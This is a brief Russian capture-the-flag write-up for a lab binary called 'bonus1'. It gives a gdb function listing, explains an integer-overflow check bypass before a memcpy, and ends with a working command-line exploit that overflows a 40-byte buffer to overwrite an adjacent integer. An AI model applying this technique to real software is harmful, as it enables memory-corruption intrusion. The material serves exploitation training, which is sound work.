Здесь у нас только одна функция main
(gdb) info func
All defined functions:

Non-debugging symbols:
0x080482d4  _init
0x08048320  memcpy
0x08048320  memcpy@plt
0x08048330  __gmon_start__
0x08048330  __gmon_start__@plt
0x08048340  __libc_start_main
0x08048340  __libc_start_main@plt
0x08048350  execl
0x08048350  execl@plt
0x08048360  atoi
0x08048360  atoi@plt
0x08048370  _start
0x080483a0  __do_global_dtors_aux
0x08048400  frame_dummy
0x08048424  main
0x080484b0  __libc_csu_init
0x08048520  __libc_csu_fini
0x08048522  __i686.get_pc_thunk.bx
0x08048530  __do_global_ctors_aux
0x0804855c  _fini


Есть буфер размером 0x28 и int.
Есть вызов atoi для первого аргумента, переданного функции, хранящейся в int. Если результат больше 9, программа уходит, ничего не делая.
В противном случае, если результат меньше 10, выполняется вызов memcpy с буфером, вторым аргументом, переданным программе, и количество копируемых байт (int * 4).

Итак, эксплойт состоит в том, чтобы найти число, которое нужно передать atoi, которое будет кратно 4 и будет достаточным для перезаписи int, переполнив буфер:

2147483648 - 2147483637 = 11
11 * 4 = 44 байта

./bonus1 -2147483637 $(python -c "print 'A'*40 + '\x46\x4c\x4f\x57'")
